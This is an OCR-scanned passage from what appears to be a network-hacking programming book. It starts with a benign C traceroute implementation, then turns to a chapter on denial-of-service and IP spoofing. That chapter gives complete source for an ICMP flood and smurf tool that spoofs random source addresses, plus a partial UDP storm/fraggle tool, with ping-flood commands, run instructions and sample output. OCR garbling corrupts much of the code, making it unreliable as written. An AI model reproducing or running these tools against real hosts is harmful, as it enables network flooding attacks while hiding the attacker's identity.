rives at. The router, at which the TTL value becomes 0, sends back an ICMP “time exceeded” 
message. This mechanism prevents packets from endlessly traveling on a network. 

The first version of traceroute sends a series of UDP messages (the default number is 30) 
incrementing the value of the TTL field for each successive message. The TTL value of the first 
message is set to 1. When the first UDP packet arrives at a router, the latter decreases the TTL 
value by 1, making it 0, and replies with an ICMP “time exceeded” message. Upon receiving 
the reply, traceroute displays the address of the router. The TTL value of the next UDP 
packet sent is 2. It is decremented to 0 by the second router the packet encounters, which 
sends back an ICMP “time exceeded” message. The succeeding UDP packets are sent until the 
packet’s complete route is traced or the default number of hops (30) is reached. But how is the 
end host is determined? The traceroute utility sends datagrams to a random port that, hope- 
fully, is not used on the given host. Therefore, ports greater than 33,434 are used. When 
a host receives a UDP datagram at an unused port, it returns an ICMP “port unreachable” 
message. This tells traceroute that the destination host has been reached and it terminates 
execution. 

Thus, the first version of traceroute works with three types of packets: UDP packets, 
ICMP “time exceeded” messages, and ICMP “port unreachable” messages. 

Therefore, two types of sockets have to be created in a traceroute program: a datagram 
socket to send UDP packets and a raw socket to receive arriving ICMP messages. 

* Creating a datagram socket to send UDP packets */ 

sendid = socket (PF INET, SOCK DGRAM, 0); 

* Creating a raw socket for receiving ICMP messages */ 
recvid = socket (PF INET, SOCK RAW, IPPROTO ICMP); 
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Only privileged users can create a raw socket; therefore, the standard Linux traceroute 
utility has the SUID bit set: 

S ls -la /usr/sbin/traceroute 

-IWSI-xI-x 1 root root 168256 Dec 2 2000 /usr/sbin/traceroute 

After the custom traceroute utility is compiled and built, it also has the SUID bit set so 
that regular users can use it. 

In the program itself, the original user rights are restored after a raw socket is created: 

setuid(getuid()); 


Because several instances of traceroute can be running on a machine at the same time, 
it is necessary to differentiate arriving ICMP messages, that is, to be able to tell whether an 
ICMP message is a reply to a datagram sent by this traceroute or to a datagram sent by some 
other traceroute. This is achieved by binding the UDP socket to a source port using the 
bind() function. A unique source port number is obtained by taking the 16 least significant 
bits of the current process’ PID and setting the most significant of them to 1. This port num- 
ber is automatically entered into the UDP header of each datagram sent: 

sport = (getpid() & Oxffff) | Ox8000; 

sabind.sin_family = AF_INET; 

sabind.sin port = htons (sport); 

if (bind(sendfd, &sabind, sizeof(sabind)) != 0) 
perror("bind() failed"); 

Pursuant to RFC 792, both ICMP messages, time exceeded and port unreachable, return 
in their last field the Internet header and 64 data bits of the original datagram (see Fig. 5.1) 
that caused the error; that is, the UDP header of the original datagram is stored in this field. 
When it receives an ICMP message, the traceroute utility analyzes this field to determine the 
source port and, hence, the source process. 





icmplen 
hlenl 
IP ICMP IP UDP 
header header header header 
20-60 saat (CGC A fll 20-60 Gatir i F 
ip icmp hip udp 


> A UDP datagram that generated 
an ICMP error 


Fig. 5.1. Headers, pointers, and lengths used in processing of ICMP errors 
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The main traceroute operations are carried out in a double nested for loop. The outer 
loop generates TTL values from 1 to the max_tti, which is 30. The nested loop sends three 
probe packets (UDP datagrams) to the destination: 

for (ttl = 1; ttl <= max ttl && done = 0; ttl++) { 


for (probe = 0; probe < nprobes; probe++) { 


A new TTL value in the IP header is set using the setsockopt () function with the IP_TTL 
parameter: 
setsockopt(sendfd, SOL_IP, IP TTL, &ttl, sizeof (int)); 


If the IP TTL parameter did not exist, to set a new TTL value, a custom IP header would 
have to be constructed using the [P_HDRINCL socket parameter. 

Every time the outer loop is executed, the salast socket address structure is initialized 
with 0): 

bzero(4salast, sizeoft(salast)); 


In the nested loop, the IP address field of this structure (ssalast.sin addr) is compared 
with the IP address of the structure returned by the recvfrom() function 
(asarecv.sin addr). If these two fields differ, the IP address from the new structure is dis- 
played, after which the new address is copied into the ésalast.sin addr structure. This 
method makes it possible for each TTL to output an IP address corresponding to the first 
probing packet; if for the given TTL the IP address changes (i.e., the route changes during 
transmission of a probing packet), the new IP address is displayed. 

Before the next probing packet is sent out, the destination port is changed (incremented 
by 1) in the nested loop: 

sasend.sin port = htons(dport + seq); 

This is done to send each of the three probing packets to a different port, thus increasing 
the chances of hitting a closed port. 

The recvfrom() function, used to receive packets, is called in the packet ok() function, 
which also parses the header fields of a received packet. The packet _ok() function returns -3 
when the waiting time expires, -2 when the ICMP “time exceeded in transit” message is 
received, and -1 when the ICMP “port unreachable” message is received. The calling function 
outputs an asterisk, the address of the intermediate router, and the address of the destination 
node for each returned value. In the last case, traceroute terminates execution. 

The custom traceroute program waits a maximum of 4 seconds for incoming packets. 
If during this time no packet arrives at the receiving socket (recvfd), then, as already men- 
tioned, -3 is returned to the calling function and an asterisk is displayed. The wait is imple- 
mented using the select () function and the FD ZERO, FD SET, and FD ISSET macros. You can 
learn more details about them in the man and related literature. 

The source code for the custom ping utility can be found in the \PART II\Chapter 5 
folder on the accompanying CD-ROM. 
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Listing 5.1. The source code for the custom traceroute utility (tracerudp.c) 





#include 
finclude 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


<stdio.h> 
<stdlib.h> 
<string.h> 
<netinet/ip.h> 
<netinet/ip icmp.h> 
<netinet /udp.h> 
<sys/types.h> 
<sys/socket.h> 
<netdb.h> 
<sys/time .h> 
<unistd.h> 


#define BUFSIZE 1500 


/* UDP data structure */ 
struct outdata { 


int outdata seq; /* Sequence number */ 
int outdata_ttl; /* TTL value */ 
struct timeval outdata_tv; /* Packet transmittal time */ 


hi 


char recvbuf(BUFSIZE]; 
char sendbuf (BUFSIZE]; 


int sendfd; /* Descriptor of the socket for sending UDP datagrams */ 
int recvfd; /* Descriptor of the raw socket for receiving 


ICMP messages */ 


/* The sockaddr() structure for sending a packet */ 

struct sockaddr in sasend; 

/* The sockaddr() structure for binding the source port */ 
struct sockaddr in sabind; 

/* The sockaddr() structure for receiving a packet */ 
struct sockaddr in sarecv; 

/* The last sockaddr() structure for receiving 4 packet */ 
struct sockaddr in salast; 

int sport; 

int dport; 


int ttl; 


int probe; 
int max_ttl = 30; /* Maximum value for the TTL field */ 
int nprobes = 3; /* Number of probing packets */ 


int dport 


= 32768 + 666; /* First destination port */ 


/* Length of the UDP data field */ 
int datalen = sizeof(struct outdata); 


/* Function prototypes */ 
void tv _sub(struct timeval *, struct timeval *); 
int packet ok{int, struct timeval *)}; 


j* ae es rata 


SS SS Se eee » | 


/* The main() function */ 
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int main(int argc, char *argv[]) 
{ 

int seq; 

int code; 

int done; 

double rtt; 

struct hostent *hp; 

struct outdata *outdata; 

Struct timeval tvrecy; 


if (argc != 2) | 
fprintf(stderr, "Usage: %5 <hostname>\n", argv[0]); 
exit(-l); 


} 


if ( (hp = gethostbyname(argv[1])) == NULL) { 
herror ("gethostbyname() failed"); 
exit(-1); 


if ( (recvfd = socket (PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) [{ 
perror("socket() failed"); 
exit (-1); 

} 


/* Restoring the initial rights */ 
setuid(getuid()); 


if ( (sendfd = socket (PF_INET, SOCK _DGRAM, 0)) < 0) { 
perror("socket() failed"); 
exit(<1l); 

} 


sport = (getpid() & Oxffff) | Oxd000; /* The UDP source port number */ 


bzero(&sasend, sizeof (sasend)); 
sasend.sin family = AF INET; 
sasend.sin_addr= *({struct in_addr *) hp->h_addr); 


Sabind.sin family = AF_INET; 

sabind.sin port = htons(sport); 

if (bind(sendfd, {struct sockaddr *)&sabind, sizeof(sabind)} != 0) 
perror("bind({) failed"); 


seq = 0; 

done = 0; 

for (ttl = 1; ttl <= max ttl && done == 0; ttl++) { 
setsockopt{sendfd, SOL IP, IP TTL, &ttl, sizeof ({int)); 
bzerolésalast, sizeof(salast)); 


printt("t2d ™“, ttl); 
fFflush(stdout); 


for (probe = 0; probe < nprobes; probet++) { 
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outdata = (Struct outdata *)sendbuf; 
outdata->outdata_ seq = ++seq; 
outdata->outdata ttl = ttl; 

gettimeofday (&outdata->outdata_tv, NULL); 


Sasend.sin_ port = htons(dport + seq); 

if ({sendto(sendfd, sendbuf, datalen, 0, {struct sockaddr *)4sasend, 
perror("sendto() failed"); 
exit (=-1); 

} 

if ( (code = packet ok(seqg, &tvrecv)) == -3) 


printf(" *"); /* The wait time expired; no answer. */ 
else |{ 


Sizeof (sasend)) < 0) 


if (memoemp(&sarecv.sin_addr, 4&salast.sin_addr, sizeof (sarecv.sin_addr)} != 0) { 
if ( (hp = gethostbyaddr(&sarecv.sin_addr, sizeof(sarecv.sin_ addr), 
sarecy.sin_family)} != 0} 


} 


printf(" $s (%s)", inet ntoa(sarecv.sin addr), hp->h name); 


else 
printft(" $s", inet _ntoa(sarecv,.sin addr) ); 


memcpy (&salast.sin_addr, &sarecv.sin_addr, sizeof (salast.sin_addr})}; 


I 


tv_sub(é&tvrecv, &Soutdata->outdata tv); 
rtt = tvrecv.tv_sec * 1000.0 + tvrecv.tv_usec / 1000.0; 
printf£(" %.3£ ms", rtt); 


if {code == -1) 
++done; 


} 


fflush {stdout}; 


printf ("\n"); 


=—_-—--— — 


return OQ; 
Sie en og a ter ee So ee ee ee ee ee 
Parsing a received packet mi 
af 
' The function returns: arf 
-3 when the wait time expires. a 
-2 when an ICMP "time exceeded in transit” message is received; */ 
the program continues executing. */ 
-1 when an ICMP "port unreachable" message is received; “sf 


the program terminates execution. f/f 
ea pes se ee ee ee ee ee ed See ee ee Ss eee ee a ee * f 
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int packet _ok(int seq, struct timeval *tv) 
{ 
int n; 
int len; 
int hlenl; 
int hlen2; 
struct ip *ip; 
struct ip *hip; 
struct icmp *icmp; 
struct udphdr *udp; 
fd set fds; 
struct timeval wait; 


Walt.tv_sec = 4; /* Waiting for a reply for 4 seconds, the longest */ 
Wait.tv_usec = 0; 


for {:7) f 

len = sizeé6of (Sarecy) ; 
FD 2ERO(&fds) ; 
FD SET (recvfd, éfds); 


if (select (recvfd + 1, &fds, NULL, NULL, &wait) > 0} 

n = recvfrom(recvfd, recvbuf, sizeof({recvbuf), 0, (struct sockaddr*) 4sarecv, 
else if (!FD_ISSET(recvfd, é&fds)) 

return (-3); 
else 

perror("recvfrom() failed"); 


gettimeocfday (tv, NULL); 


ip = (struct ip *) recvbut; /* Start of the IP header */ 
hlenl = ip->ip hl << 2; /* Length of the IP header */ 


/* Start of the ICMP header */ 

icmp = (struct icmp *) (recvbuf + hlenl); 

/* Start of the saved IP header */ 

hip = (struct ip *) (recvbuf + hlenl + 8); 

/* Length of the saved IP header */ 

hlen2 = hip->ip hl << 2; 

/* Start of the saved UDP header */ 

udp = (struct udphdr *) (recvbuf + hlenl + ? + hlen2); 


if ({icmp->icmp type == ICMP _TIMXCEED && 
icmp->icmp code == ICMP TIMXCEED INTRANS) { 
if (hip->ip_p == IPPROTO_UDP && 
udp->source == htons(sport) && 
yudp-sdest == htons(dport + seq) ) 
return (-2}; 
} 


if (icmp->icmp type == ICMP _UNREACH) { 
if (hip->ip p == IPPROTO UDP && 
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udp->source == htons (sport) &4 
udp->dest == htons(dport + seq)) { 
if (icmp->icemp code == ICMP UNREACH PORT) 


return (-1); 
} 
i 
} 
} 
[Pim eee teeses os 
/* Subtracting one timeval structure from another */ 
[Pt eeeeeeeeeeeeeeee=== ------ [Toles enlaslontentante lo lententeslectesientenleieateienter * 


void tv_sub(struct timeval *out, struct timeval *in} 
if { (out->tv usec -= in->tv_usec) < 0) { 
out->tv sec--; 
out->tv_usec += 1000000 
} 
out—->tyv_ sec -= in->tv_sec; 





5.2. Version 2: Using a Raw Socket 
to Send ICMP Packets 


The only difference between the second and the first versions of the custom traceroute pro- 
gram is that the second version sends [CMP echo request messages instead of UDP datagrams. 
As in the first version, the TTL value in the IP packet header is sequentially incremented by 1 
for each probe. The intermediate routers are supposed to return the ICMP “time exceeded” 
message, and the destination host is supposed to return an echo reply message. 

Thus, the second version does not require creating two types of sockets; only a single 
ICMP socket is used for sending and receiving ICMP messages: 

/* Creating a raw socket for sending and receiving ICMP messages */ 

sd = socket (PF_INET, SOCK RAW, IPPROTO ICMP); 

This version does not use network ports because the IP system, not an individual service, 
is responsible for receiving and sending messages. ICMP messages for a particular traceroute 
instance are identified using the current process’ s PID, 

The source code for the second version of the custom traceroute utility can be found 
lin the \Part I[\Chapter 5 directory on the accompanying CD-ROM. The file's name is 
tracericmp.c. You may notice that it shares many features with the ping utility. If you grasped 
the ping utility and the first version of the custom traceroute program, you should have no 
questions concerning its operation. 





Chapter 6: DoS Attack 
and IP Spoofing Utilities 








Denial-of-service (DoS) attacks are directed at degrading the work performance of or blocking 
access to a network or a computer and its resources. There are four main types of DoS attacks: 


O 
O 
O 
O 


Attacks that exhaust a network's resources 

Attacks that exhaust a host’s resources (monopolizing the memory, CPU, disk quotas, etc.) 
Attacks that exploit software bugs to crash a host or induce it to operate erratically 

Attacks that modify the system’s configuration or state to block data transmission, break 
the connection, or cause drastic performance loss 


In addition, DoS attacks can be classified as local or remote. Local attacks are carried out 
directly at the attacked host, and remote attacks are carried out over network. In this book, 
I only consider how to program utilities for carrying out remote DoS attacks, because local DoS 
attacks are rare and of little interest; moreover, perpetrating a local DoS attack requires gaining 
physical access to the vulnerable host, which is not a prerequisite for a remote DoS attack. 

As a rule, remote DoS attacks are accompanied by IP spoofing, that is, faking the return 
address in sent packets to hide the address of the host, from which the attack is being waged. 
Therefore, when considering DoS attack programs, | also consider implementing IP spoofing. 

This chapter considers only the first three of the previously-listed DoS attacks. The fourth 
type is implicitly considered in Chapter 9 when active sniffing is discussed. This is because, in 
addition to intercepting traffic, active sniffing methods can cause denial of service, making it 
impossible to transmit data or breaking an existing connection between hosts. Simple pulling 
the plug out of the wall socket, that is, depowering a device, can also be placed in the last DoS 
attack category. 
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The first two types of DoS attacks listed previously are called flooding, because they gradu- 
ally flood a network or a host with requests for its resources, eventually hogging all or most 
resources and leaving none for the legitimate requests. 

Not all known DoS attacks can be clearly placed into some specific category. For example, 
the UDP storm attack can be placed into all three listed DoS attack types. Therefore, any 
further mention of a specific DoS attack in a category is no more than a convention. 


6.1. Attacks That Exhaust Network Resources 


6.1.1. ICMP Flooding and Smurf 


An ICMP flooding attack exhausts the network’s resources by sending it a large number of 
ICMP echo request messages. Therefore, a program to implement this type of DoS attack is 
not that different from the ping utility, which was considered in Chapter 4. The main differ- 
ence is that it only sends echo requests; it does not have to worry about receiving replies to 
them. In addition, no delay is necessary between successive packets; on the contrary, packets 
must be sent as rapidly as possible. For a DoS attack to be more efficient, the size of packets 
can be increased. The standard ping utility can be used to carry out an ICMP flooding 
attack by running it with the -f and -s parameters. The former tells the utility to send echo 
requests as rapidly as possible, and the latter is used to increase the size of the sent packets. 
For example, the following command sends an uninterrupted stream of 3-KB packets to the 
victim.example.com host: 


f ping -f -s 3072 victim.example.com 


After each packet it sends, the ping utility outputs a dot on the screen, which is deleted 
when a corresponding echo request is received. 

The standard ping utility, however, has no means of changing the sender’s address. This 
shortcoming is fixed in a custom ping utility (see Listing 6.1 later in this section). This utility 
can also be used to carry out the smurf DoS attack. In a smurf attack, a perpetrator sends 
a broadcast [CMP echo request on a local network and gives the victim’s address as that of the 
request’s originator, This results in all computers on the network sending an echo reply mes- 
sage to the victim's address, thus flooding its resources. 

To implement IP spoofing, the utility will fill all fields of the IP header; this includes filling 
the source IP address field with a fake address (see Section 3.4.2). To build a custom packet, 
araw socket must be created: 

sd = socket (PF INET, SOCK RAW, IPPROTO RAW); 


I used the IPPROTO RAW constant, but the IPPROTO ICMP constant can also be used. Which 
of these constants you use Is of no importance, because the utility must only send ICMP pack- 
ets, not receive them (see Section 3.5.2). 

For the raw socket, the IP_HDRINCL option is specified using the setsockopt () function. 
This is done to prevent the TCP/IP stack from generating IP headers itself. 
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To be able to send broadcast messages, another call to the setsockopt () function is made 
to set the SO_ BROADCAST socket parameter, which is necessary for implementing a smurf attack. 

A buffer is defined for outgoing packets as follows: 

char sendbuf([sizeof(struct iphdr) + sizeof(struct icmp) + 1400]; 


That is, the size of each outgoing packet will be determined by the total lengths of the IP 
and ICMP headers plus 1,400 bytes tacked on top of that. The definitions of the IP and ICMP 
header structures are taken from the netinet/ip.h and netinet/ip_icmp.h header files, respec- 
tively. The only reason I use the value of 1,400 is to increase the size of the outgoing packet. 
This part of the buffer will be filled with trash data. 

The size of outgoing packets could be set to 65,535 bytes. (This limit is set by the 16-bit IP 
header length field, as shown in Fig. 3.5). But then, it would become necessary to provide the 
program with a packet fragmentation algorithm in case the network's MTU is smaller than the 
size of the outgoing packet. For example, Ethernet MTU is 1,500 bytes. Sending a longer 
packet to an Ethernet network will result in a sending function error, with the perror () func- 
tion outputting the “message too long” message. 

The ICMP header is 8 bytes long, and the IP header is 20 to 60 bytes long; therefore, the 
size of an outgoing packet will be 1,468 bytes or less. Most networks will let a packet of this 
size through. Note that if the task of filling the IP header was left to the IP subsystem, that is, 
the IP HDRINCL socket option was not set, packets up to 65,535 bytes could be sent because 
the fragmentation task would be handled by the IP subsystem. 

Thus, it makes no sense to send too large packets; they would be fragmented anyway: So 
1,400 bytes is the optimal packet size. 

Next, you have to define pointers to the structures of the headers allocated in the sendbuf 
buffer. This can be done as follows: 

struct iphdr *ip hdr = (struct iphdr *)sendbuf; 

struct icmp *icmp hdr = (struct icmp *) (sendbuf + sizeof(struct iphdr)); 

Then, directly in the buffer, the IP and ICMP header fields are filled: 

/* Filling the IP header */ 

ip hdr->ihl = 5; 

ip hdr->version = 4; 

ip hdr->tos = 0; 

ip hdr->tot len = htons(sizeof(struct iphdr) + sizeof(struct icmp) + 1400); 
ip hdr->id = 0; 

ip hdr->fraqg off = 0; 

ip hdr->ttl = 255; 

ip hdr->protocol = IPPROTO ICMP; 

ip hdr->check = 0; 

ip hdr->check = in_cksum((unsigned short *)ip_ hdr, sizeof(struct iphdr)); 
ip hdr->saddr = srcaddr; 


' Actually, sending fragmented packets does make some sense: Assembling these packets will consume r e- 
sources of the victim's host in addition to exhausting the network resources. This, h owever, is of little impor- 
tance, especially when compared to an attack such as SYN flooding. 
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ip hdr->daddr = dstaddr; 


/* Pilling the ICMP header */ 
icmp hdr->icmp type = a a 
icmp hedr->icmp code = 0; 

icmp hdr->icmp id = 1; 
icmp hdr->icmp seg = 
icmp hdr->icmp_cksum = 0; 

icmp hdr->ioanp _cksum = in_cksum((unsigned short *)icup hdr, sizeof(struct icmp) + 1400); 

The protocol field (ip _hdr->protocol) of the IP header is filled with the IPPROTO_ICMP 
constant (the value of 1), indicating that the given packet is being sent over ICMP. 

The checksum in both headers is calculated by the same in_chsum() function, only differ- 
ent values are passed to it for different headers. (This question was considered in Section 3. 6). 
Pursuant to RFC, before calculating the checksum, the checksum field must be zeroed out. 

As you can see, you can fill the source (ip hdr->saddr) and destination (ip_hdr—>daddr) 
IP address fields yourself. Thus, you can put any IP address in the network byte order into 
these fields, that is, perform IP spoofing. Addresses are passed to the program by the user from 
the command line. The source address is given in the first argument, and the destination is in 
the second. The addresses passed to the utility are converted to IP addresses in the network 
byte order in the resolve() function. Entering the word “random” as the source host makes 
the program fill the source IP address field with random values generated using the random () 
function. Packets are sent in an endless loop. 

According to man 7 raw, the checksum (ip hdr->check), source address (ip hdr->saddr), 
packet identifier (ip hdr->id), and total length (ip hdr->tot len) fields do not necessarily 
have to be filled manually; the IP subsystem can do this for you. In the program, | am filling 
all of these fields to show how to do this the right way. 

The checksum field in the ICMP head also does not have to be filled. If it is not, the packet 
will be sent successfully, but the destination host will drop it as invalid. Although for a DoS 
attack it is not generally important whether the victim rejects or accepts a packet, the latter is 
preferable, because in this case the victim sends echo replies to echo requests, thus flooding 
the channel even more. 

To check the operation of the utility, start the tcpdump utility in a separate terminal and 
observe packets being sent. Then compile the icmpflood utility and run it in the ICMP flood- 
ing mode, specifying that random source IP addresses should be used: 

# gcc icmpflood.c -o icmpflood 

# ./icmpflood random 192.168.10.1 


= 
*s 


The output produced should look similar to this: 


06:20:52.842589 ethO > 103.69.139.107 > 192.168.10.1: icmp: echo request 
06:20:52.842589 ethO > 198.35.123.50 > 192.168.10.1: icmp: echo request 
06:20:52.842589 ethO > 105.152.60.100 > 192.168.10.1: icmp: echo request 
06:20:52.842589 ethO > 115.72.51.102 > 192.168.10.1: icmp: echo request 
06:;20:52.842589 ethO > §61.220.176.116 > 192.168.10.1: icmp: echo request 
06:20:52.842589 ethO > 255.92.73.25 > 192.168.10.1: icmp: echo request 
06:20:52.842589 ethO > 74.148.232.42 > 192,.168.10.1: icmp: echo request 
06:20:52.842589 ethO > 236.988.85.98 > 192.168.10.1: lemp: echo request 
06:20:52.842589 ethO > 41.31.142.35 > 192.168.10.1: icmp: echo request 


a 
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There are no replies from host 192.168.10.1 because it sends them to random addresses. 
To carry out a smurf attack, run the utility as follows: 
# ./icmpflood 192.168.10.132 192.168.10.255 


Here, a broadcast request 192.168.10.255 is sent from host 192,.168.10,132. In response, all 
computers in the 192.168.10.0 network will send echo replies to host 192.168.10.132. 

The source for the utility is shown in Listing 6.1. It can also be found in the /PART II/ 
Chapter 6 directory on the accompanying CD-ROM. 





Listing 6.1. A utility for ICMP flooding and smurf attacks (icmpflood.c) 





#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 

#include <sys/types.h> 
finclude <sys/socket.h> 
finclude <netinet/in.h> 
minclude <netinet/ip.h> 
#include <netinet/ip icmp.h> 
finclude <netdb.h> 


I ea na i a ar SS ES */ 
/* Converting the host name into its IP address */ 
cc a A ea and ap et a Lerten +f 


unsigned long resolve(char *hostname) 
{ 


struct hostent *hp; 


if ( (hp = gethostbyname (hostname)) == NULL) { 
herror ("gethostbyname() failed"); 
exit(=<1); 


} 


return *(unsigned long *)hp->h_addr list([0]; 


f®--------- ------ - - -- - ---- FF 
/* Calculating the checksum */ 
j* ees Gas an sa ac cg eg a acces te cp ss ee * 


unsigned short in cksum(unsigned short *addr, int len) 
{ 

unsigned short result; 

unsigned int sum = 0; 


/* Adding all 2-byte words */ 
while (len > 1} { 

sum += *addr++; 

len -= 2; 


} 


/* If there is a byte left over, adding it to the sum */ 
if (len == 1) 
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sum += *(unsigned char*) addr; 


sum = (sum >> 16) + (sum & OXFFFF); /* Adding the carry */ 


sum += (sum >> 16); 
result = ~sum; 
return result; 


f® Pee ee eee eee Pare Oe ae ee a ed aL) ee ees */ 
/* The main() function */ 
fe----------—-----------* ff 


int main(int argc, char *argv[)) 


{ 


int sd; 

const int on = I; 

int rnd = 0; 

unsigned long dstaddr, srcaddr; 
struct sockaddr in servaddr; 


/* Adding the carry again */ 
/* Inverting the result */ 


char sendbuf[sizeof(struct iphdr) + sizeof(struct icmp) + 1400); 
struct iphdr *ip hdr = (struct iphdr *)sendbutf; 


struct icmp *icmp hdr = (struct icmp *) 


if {argc != 3) { 
fprintf(stderr, 


(sendbuf + sizeof (struct iphdr)); 


"Usage: %5s <source address | random> <destination address>\n", 


argv[0]); 
exit {-1l); 


} 


/* Creating a raw socket */ 


if ( {sd = socket(PF_INET, SOCK_RAW, IPPROTO RAW)) < 0) { 


perror("socket() failed"); 
exit (-1)7 


/* Because the IP header will be filled in the program, 


set the IP HDRINCL option. */ 


if (setsockopt (sd, IPPROTO IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) 


{ 


perror("setsockopt() failed"); 
exit(-1); 
I 


/* Enabling the broadcasting capability */ 
if (setsockopt (sd, SOL SOCKET, S50 BROADCAST, 


perror("setsockopt() failed"); 
exit(-1); 
} 


/* If the first argument is "random," 


(char *)&on, sSizeocf(on)}) < 0) { 


the source IP address is randomly selected. */ 


if (!stremp(argv[1], "“random")) { 
rnd = 1; 
srcaddr = random(); 
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} else 
srceaddr = resolvelargv[1]); 


/* The victim's IP address */ 
dstaddr = resolvelarav[2]}; 


bzero(&servaddr, sizeof (servaddr) ); 
servaddr.sin family = AF INET; 
servaddr.sin addr.s addr = dstaddr; 


/* Filling the IP header */ 

ip hdr->ihl = 5; 

ip hdr->version = 4; 

ip_hdr->tos = 0; 

ip hdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmp) + 1400); 
ip_hdr->id = 0; 

ip hdr->frag off = 0; 

ip hdr->ttl = 255; 

ip hdr->protecol = IPPROTO ICMP; 

ip hdr->check = 0; 

ip hdr->check = in_cksum((unsigned short *)ip hdr, sizeof(struct iphdr)); 
ip_hdr->saddr = srceaddar; 

ip hdr->daddr = dstaddr; 


/* Filling the ICMP header */ 
icmp hdr->icmp type = ICMP ECHO; 
icmp _hdr->icmp_code = 0; 
icmp_hdr->icmp_id = 1; 
icmp hdr->icmp_seq = 1; 
iomp hdr->icmp cksum = 0; 

iomp hdr->icmp cksum = in _cksum( (unsigned short *)icmp_ hdr, sizeof(struct icmp) + 1400); 


/* Sending packets in an endless loop */ 


while (1) { 
if (sendto(sd, 
sendbuf, 
sizeof (sendbuf), 
0, 


{struct sockaddr *)&éservaddr, 
sizeof(servaddr)) < 0) { 
perror("sendto() failed"); 
exit(-1); 


/* Generating a new random source IP address 
if the first argument was "random" */ 

if (rnd) 
ip hdr->saddr = random(); 


} 


return 0; 
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6.1.2. UDP Storm and Fraggle 


The UDP storm attack is also called Chargen or Echo-Chargen because this attack makes use 
of these services. In response to a UDP request, the UDP service chargen (port 19) sends 
a packet of characters, and the UDP service echo (port 7) sends the arrived packet back. Thus, 
sending UDP packets from port 19 to port 7 starts an endless loop. This loop can be started 
both at a single host and between two remote hosts as long as the hosts are running the chargen 
and echo services. Not only port 7 but any other port that automatically answers any request 
can be used, for example, port 13 (daytime) or port 37 (time). 

Listing 6,2 shows the source code for a program for carrying out UDP storm and fraggle 
attacks. A fraggle attack is similar to a smurf attack, but it uses UDP packets. The attacker 
sends UDP packets from a spoofed address to a broadcast address (usually to port 7, echo) of 
the intermediary broadcast machines, or amplifiers. Each machine of the network that is en- 
abled to answer echo request packets will do so, thus generating a huge amount of traffic hit- 
ting the target machine like a tsunami. 

This program is much the same as the icmpflood.c program (Listing 6.1), only here the UDP 
header is filled instead of the ICMP header. Note that a pseudo header (see Section 3.6) is used for 
calculating the checksum in the UDP header. Moreover, if the value returned from the in _cksum () 
function is 0, pursuant to the RFC 768 requirements, it must be replaced with Oxf fff. 

Perhaps you have noticed that some header fields of network packets and some sockaddr 
family structures are specified in the network byte order with the help of conversion functions 
like htons() and inet aton(), whereas other fields are specified in the server byte order. Un- 
fortunately, there is no general rule concerning this issue: Some fields must be specified in the 
network byte order only, some can only be specified in the host byte order, and for some the 
order does not matter. This raises a legitimate question: In what order must a specific field be 
specified? The only pertinent information I have found relevant to this question is in the 
UNIX Network Programming book by Richard Stevens: 

Theoretically, a UNIX implementation could store the fields of a socket address structure in 
the host byte order and then do the necessary conversions when moving fields into protocol headers 
and back, allowing us to not concern ourselves with this task. But historically and from the 
Posix.le perspective, some of the socket address structure fields must have the network byte order. 

The only thing known for certain is that fields containing port numbers and IP addresses 
must be specified in the network byte order. As for other fields, I determined their order ex- 
perimentally. Therefore, in programs in this and other chapters of the book, I use the htons (), 
htenl (), inet_aton(), and other byte order conversion functions on network packet headers 
and sockaddr family structures when I judge them to be most appropriate. 

In addition to the addresses, the source and destination ports must be passed to the 
udpstorm program in the command line — for example, as follows: 

fF gcc udpstorm.c -—o udpstorm 

# ./udpstorm 192.168.10.1 19 192.168.10.130 7 

The source for the udpstorm program is shown in Listing 6.2. It can also be found in the 
/PART II/Chapter 6 directory on the accompanying CD-ROM. 
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Listing 6.2. A Utility for UDP storm and fraggle attacks (udpstorm.c) 





#include <stdio.h> 
finclude <stdlib.h> 
finclude <string.h> 
f#include <sys/types.h> 
®include <sys/socket.h> 
finclude <netinet/in.h> 
#include <netinet/ip.h> 
finclude <netinet/udp.h> 
finclude <netdb,h> 


ee * 
/* Converting the host name into its IP address */ 
a eis mas ime a mel ct nomi tml vt eh en cs Tes cs sa is wh as mn sr mo apace a ee ee 


: f 
unsigned long resolve(char *hostname) 
{ 
struct hostent “hp; 


if { (hp = gethostbyname (hostname)} == NULL) { 
herror ("gethostbyname() failed"); 
exit (-1l)+ 

} 


return *(unsigned long *)hp->h_addr list[0O); 
} 


i aoa fairest ieee Hap een a a be ee ee eS ee * f 
/* Calculating the checksum */ 
jeees-- sa ca en le i a a a a * / 


unsigned short in_cksum(unsigned short *addr, int len) 
{ 

unsigned short result; 

unsigned int sum = 0; 


/* Adding all 2-byte words */ 
while {len > 1} 
{ 

sum += *addr++; 

len -= ?; 


} 


/* If there is a byte left over, adding it to the sum */ 
1f (len == 1) 
sum += *(unsigned char*) addr; 


sum = (sum >> 16) + (Sum & OXFFFF); /* Adding the carry */ 

sum += (sum >> 16); /* Adding the carry again */ 
result = ~sum; /* Inverting the result */ 
return result; 
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/* The main(}) function */ 


int main(int argc, char *argv[]) 
{ 
int sd; 
const int on = 1; 
unsigned long dstaddr, srcaddr; 
int dport, sport; 
Struct sockaddr in servaddr; 


/* The pseudo header structure */ 

Struct pseudohdr 
unsigned int source address; 
unsigned int dest_address; 
unsigned char place holder; 
unsigned char protocol; 
unsigned short length; 

} pseudo_hdr; 


char sendbuf[sizeof(struct iphdr) + sizeof(struct udphdr) ]; 

struct iphdr *ip hdr = (struct iphdr *)sendbuf; 

struct udphdr *udp hdr = (struct udphdr *) (sendbuf + sizeof(struct iphdr)); 
unsigned char *pseudo packet; /* A pointer to the pseudo packet */ 


if farge != 5) { 
fprintf(stderr, 
"Usage: ts <source address> <source port> <destination address> <destination port>\n", 
argv([0]); 
exit (-1}; 


/* Creating a raw socket */ 

if { (sd = socket (PF_INET, SOCK_RAW, IPPROTO RAW)) < 0) { 
perror("socket() failed"); 
exit (-1); 


/* Because the IP header will be filled in the program, 
set the IP HDRINCL option */ 

if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { 
perror("setsockopt() failed"); 
exit (-1); 


srcaddr = resolve (argv[1]); 
/* The source IP address */ 
sport = atoi(argv[zZ]); 
/* The source port */ 


dstaddr = resolve(argyv[3]); /* The victim's IP address */ 
